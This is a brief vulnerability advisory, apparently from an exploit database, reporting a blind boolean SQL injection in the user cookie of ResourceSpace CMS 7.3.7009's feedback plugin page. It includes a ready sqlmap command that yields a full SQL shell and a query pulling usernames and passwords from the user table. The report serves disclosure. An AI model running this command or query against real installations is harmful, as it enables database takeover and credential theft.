ResourceSpace CMS 7.3.7009 SQL Injection Vulnerability

ID 1337DAY-ID-24139
Type zdt
Reporter William
Modified 2015-08-25T00:00:00


ResourceSpace CMS versions 7.3.7009 and below suffer from a remote SQL injection vulnerability.

                                            Title: Blind boolean sql injection vulnerability in ResourceSpace CMS

Author: William F. Reyor III

Contact: [email protected]

Published: August 22 2015

Vendor: Montala Limited

Vendor url:

Software: ResourceSpace Digital Asset Management Software

Versions: 7.3.7009  and prior

Status: Unpatched

Vulnerable scripts:



There is blind boolean SQL injection vulnerability in the user cookie on
the /plugins/feedback/pages/feedback.php application.

This can be validated with sqlmap with the following flags, giving a full
sql shell:

./ -u "http://<hostname>/plugins/feedback/pages/feedback.php"
--cookie="user=test" --level=2 --technique=B --sql-shell

        This also allows an attacker to execute arbitrary queries such as
'select username, password, usergroup from user

William Reyor

*"L'essentiel est invisible pour les yeux"*

# [2018-02-09]  #